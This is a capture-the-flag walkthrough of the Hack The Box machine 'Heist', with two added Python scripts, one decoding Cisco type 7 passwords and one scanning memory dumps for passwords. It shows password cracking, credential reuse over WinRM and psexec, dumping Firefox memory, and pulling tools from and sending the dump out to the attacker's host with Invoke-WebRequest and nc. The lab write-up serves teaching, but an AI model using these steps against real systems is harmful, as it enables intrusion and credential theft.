HTB: Heist

Details

This machine is Heist from Hack The Box

Recon

First a service discovery scan

root@kali:~# nmap -sV -p- 10.10.10.149
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-17 11:44 EDT
Nmap scan report for 10.10.10.149
Host is up (0.044s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 210.06 seconds

User

SMB first, trying a null session

root@kali:~# smbmap -H 10.10.10.149 -u Anonymous
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

No anonymous SMB access, so on to the web server on port 80, http://10.10.10.149

Screenshot 1

I clicked login as guest and got sent to http://10.10.10.149/issues.php

Screenshot 2

The attachment was http://10.10.10.149/attachments/config.txt

Screenshot 3

username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

There was also a username of Hazard. The two "password 7" strings are Cisco type 7, which is reversible obfuscation (XOR with a fixed, well-known key) rather than a hash, so I ran them through the Cisco password decoder at http://www.ifm.net.nz/cookbooks/passwordcracker.html and got both back instantly

rout3r:$uperP@ssword
admin:Q4)sJu\Y8qz*A3?d
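The online decoder above is just applying Cisco's fixed type 7 key, which is public. As an added example (my code, not part of the original writeup), here is a decoder and encoder for type 7 plus a small parser that pulls every "password 7" entry out of an IOS config. The sample config is the three lines shown from config.txt above; the regex and function names are mine. Note that the "enable secret 5" line is deliberately not handled here, because that one is md5crypt and needs a real cracker.

```python
import re

# Cisco's fixed type 7 key (publicly documented for decades). "password 7" is
# a byte-wise XOR against this key, so it is reversible obfuscation, not a hash.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Two-digit decimal key offset followed by one hex byte per plaintext character.
TYPE7_RE = re.compile(r"\d\d(?:[0-9A-Fa-f]{2})+")

# Matches 'username NAME [privilege N ...] password 7 HEX' and
# 'enable password 7 HEX' lines of an IOS config (regex is my own).
CRED_RE = re.compile(
    r"^(?:username\s+(?P<user>\S+)\s.*?|enable)\s*password\s+7\s+"
    r"(?P<hex>\d\d(?:[0-9A-Fa-f]{2})+)\s*$",
    re.M,
)


def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string; raises ValueError on anything that is not one."""
    if not TYPE7_RE.fullmatch(encoded):
        raise ValueError(f"not a well-formed type 7 string: {encoded!r}")
    offset = int(encoded[:2])
    if offset >= len(TYPE7_KEY):
        raise ValueError(f"offset {offset} is outside the key")
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")


def encode_type7(plain: str, offset: int = 2) -> str:
    """Produce a type 7 string the way IOS does, useful for round-trip checks."""
    data = plain.encode("ascii")
    body = bytes(c ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)] for i, c in enumerate(data))
    return f"{offset:02d}{body.hex().upper()}"


def decode_config(config: str):
    """Return (name, plaintext) for every 'password 7' entry in a config.

    The name is the username, or 'enable' for an 'enable password 7' line.
    """
    return [
        (m.group("user") or "enable", decode_type7(m.group("hex")))
        for m in CRED_RE.finditer(config)
    ]


# The three credential lines from config.txt on the box (not constructed).
SAMPLE_CONFIG = """\
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
"""

if __name__ == "__main__":
    for name, password in decode_config(SAMPLE_CONFIG):
        print(f"{name}:{password}")
```

Running it prints rout3r:$uperP@ssword and admin:Q4)sJu\Y8qz*A3?d, the same two results the web decoder gave. The takeaway for a config review is that "service password-encryption" only protects against shoulder surfing; anything that matters should be an "enable secret" (ideally type 8 or 9 on current IOS) and the config file itself should be treated as a credential.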

The remaining credential is a real hash, an enable secret 5, which is md5crypt

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

I saved it to a file called crack and set john on it with rockyou

root@kali:~# john crack --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)
1g 0:00:00:12 DONE (2019-10-17 12:03) 0.07855g/s 275375p/s 275375c/s 275375C/s stealthy001..ste88dup
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I'll try

Hazard:stealth1agent

on SMB

root@kali:~# smbmap -H 10.10.10.149 -u Hazard -p stealth1agent
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.149...
[+] IP: 10.10.10.149:445  Name: 10.10.10.149
  Disk                                                    Permissions
  ----                                                    -----------
  ADMIN$                                              NO ACCESS
  C$                                                  NO ACCESS
  IPC$                                                READ ONLY

I took a look at IPC$

root@kali:~# smbclient //10.10.10.149/IPC$ -U Hazard
Enter WORKGROUP\Hazard's password:
Try "help" to get a list of possible commands.
smb: \>

Time to look

smb: \> ls
NT_STATUS_INVALID_INFO_CLASS listing \*

IPC$ is the named pipe share, not a file share, so there is nothing to list there. I moved on again, this time to WinRM on port 5985; https://github.com/Hackplayers/evil-winrm is a script for this

root@kali:~# ./evil-winrm.rb -i 10.10.10.149 -u Hazard -p stealth1agent

Info: Starting Evil-WinRM shell v1.7

Info: Establishing connection to remote endpoint

Error: Can't establish connection. Check connection params

Error: Exiting with code 1

So that fails. The password itself is good (it worked for SMB), so Hazard is most likely just not allowed to use remote management. I went back to SMB and used the creds I have to enumerate users, brute forcing RIDs over the LSARPC pipe with impacket's lookupsid.py

root@kali:~# /usr/share/doc/python-impacket/examples/lookupsid.py Hazard@10.10.10.149
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

So the other users are

Chase
Jason

I tried these on WinRM with each of the passwords I had so far until one worked

root@kali:~# ./evil-winrm.rb -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

Info: Starting Evil-WinRM shell v1.7

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents>

This gave me a shell, time to dig

*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir

    Directory: C:\Users\Chase\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt

A file and my flag

*Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
[REDACTED]

System

I noticed Firefox was installed, which is unusual for a server. To make the rest of this easier I first moved nc over, serving it from a SimpleHTTPServer on my box and pulling it with Invoke-WebRequest

*Evil-WinRM* PS C:\tmp> Invoke-WebRequest -URI http://10.10.14.23/nc.exe -OutFile C:\tmp\nc.exe

Then some enumeration of the running processes

*Evil-WinRM* PS C:\Users\Chase\Documents> Get-Process
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
[SNIP]
   1144      71   140872     179640      29.55   6316   1 firefox
    341      19    10016      37464       0.66   6440   1 firefox
    408      31    17484      63300       2.45   6692   1 firefox
    390      32    44192      75952      55.09   6996   1 firefox
    358      25    16236      37680       0.80   7156   1 firefox  

Firefox is actually still running, with several processes and a fair amount of CPU time used. A live browser can hold credentials in memory (form fields, URLs with query strings, crash reporter state), so it is worth dumping the process and looking. I grabbed a copy of procdump from Sysinternals and transferred it with my SimpleHTTPServer

*Evil-WinRM* PS C:\tmp> Invoke-WebRequest -URI http://10.10.14.23/procdump64.exe -OutFile C:\tmp\procdump64.exe

I dumped the process that was using the most CPU time (-ma writes a full memory dump rather than a minidump, which is what you want when looking for strings)

*Evil-WinRM* PS C:\tmp> .\procdump64.exe /accepteula -ma 6996 firedump.dmp

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:20:47] Dump 1 initiated: C:\tmp\firedump.dmp
[01:20:47] Dump 1 writing: Estimated dump file size is 311 MB.
[01:20:48] Dump 1 complete: 311 MB written in 1.0 seconds
[01:20:48] Dump count reached.

And moved the result back to my box over nc

root@kali:~# nc -nvlp 4444 > firefox1.dmp
*Evil-WinRM* PS C:\tmp> cmd /r ".\nc.exe 10.10.14.23 4444 < firedump.dmp"

I then ran strings over the dump and grepped for passwords

root@kali:~# strings firefox1.dmp | grep "password="
            label-password="&fillPasswordMenu.label;"
            accesskey-password="&fillPasswordMenu.accesskey;"
            label-password="&fillPasswordMenu.label;"
            accesskey-password="&fillPasswordMenu.accesskey;"
            label-password="&fillPasswordMenu.label;"
            accesskey-password="&fillPasswordMenu.accesskey;"
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=

The first few lines are just Firefox UI markup, but the crash reporter restart argument holds a full login URL, so a username and password

[email protected] : 4dD!5}x/re8]FBuZ
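strings | grep "password=" works, but it is noisy (the label-password="&fillPasswordMenu.label;" lines above) and plain strings only finds 8-bit text, while much of a Windows process's memory holds UTF-16LE strings that it silently skips unless you also run strings -el. As an added example (my code, not part of the original writeup), here is a scanner that does both encodings and only reports password-like parameters that actually carry a value, URL-decoded. The sample dump bytes are constructed: the password value is the one recovered above, but the login.php URL, the admin%40example.invalid username and the UTF-16 string are made up for the test.

```python
import mmap
import re
import sys
from urllib.parse import unquote

# Printable runs, the way `strings` finds them: 8-bit, and UTF-16LE, which is
# how much of a Windows process's memory stores text and which plain
# `strings` (without -el) silently misses.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

# A URL/form parameter whose name looks like a password and that has a real
# value. Requiring the value not to start with a quote drops markup such as
# label-password="&fillPasswordMenu.label;" that a plain grep also matches.
PASS_PARAM = re.compile(r"(?<![\w-])([\w-]*(?:pass|pwd)[\w-]*)=([^&\s\"']+)", re.I)


def extract_strings(blob):
    """Yield printable runs from a bytes-like object (bytes or mmap)."""
    for m in ASCII_RUN.finditer(blob):
        yield m.group().decode("ascii")
    for m in UTF16_RUN.finditer(blob):
        yield m.group().decode("utf-16-le")


def find_password_params(blob):
    """Return unique (parameter, decoded value) pairs, in order of discovery."""
    hits = []
    for s in extract_strings(blob):
        for key, raw in PASS_PARAM.findall(s):
            hits.append((key, unquote(raw)))
    return list(dict.fromkeys(hits))  # the same string appears many times in a dump


# Constructed sample "dump": binary noise around a Firefox UI attribute, two
# copies of a crash reporter restart argument (the password is the one from the
# real dump, the URL around it is made up) and a UTF-16LE URL with a
# percent-encoded password.
SAMPLE_DUMP = (
    b"\x00\x01\x02MZ\x90\x00"
    b'label-password="&fillPasswordMenu.label;"\x00'
    b"MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin%40example.invalid"
    b"&login_password=4dD!5}x/re8]FBuZ&login=\x00"
    b"MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin%40example.invalid"
    b"&login_password=4dD!5}x/re8]FBuZ&login=\x00\xff\xfe"
    + "https://example.invalid/api?user=svc&passwd=s3cr3t%21&x=1".encode("utf-16-le")
    + b"\x00\x00\x7f"
)

if __name__ == "__main__":
    if len(sys.argv) == 2:
        # Real use: memory-map the dump so a multi-hundred-MB file is not copied.
        with open(sys.argv[1], "rb") as f, mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mm:
            found = find_password_params(mm)
    else:
        found = find_password_params(SAMPLE_DUMP)
    for key, value in found:
        print(f"{key} = {value}")
```

Run it as python3 scan.py firefox1.dmp against the dump pulled back above; with no argument it runs over the constructed sample. The regex is deliberately narrow (names containing "pass" or "pwd" followed by a value); when hunting more broadly, the same two extractors can feed any other pattern, for example cookie or Authorization headers.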

I tried it with impacket's psexec.py as the Administrator, since WinRM was being unstable

root@kali:~# /usr/share/doc/python-impacket/examples/psexec.py administrator@10.10.10.149
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file bwErrqnm.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service IYWo on 10.10.10.149.....
[*] Starting service IYWo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

It worked, and as psexec creates a service the shell runs as SYSTEM

C:\Windows\system32>whoami
nt authority\system

Time to grab me a flag

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 78E3-E62D

 Directory of C:\Users\Administrator\Desktop

04/22/2019  09:05 AM    <DIR>          .
04/22/2019  09:05 AM    <DIR>          ..
04/22/2019  09:05 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,922,630,656 bytes free

C:\Users\Administrator\Desktop>type root.txt
[REDACTED]
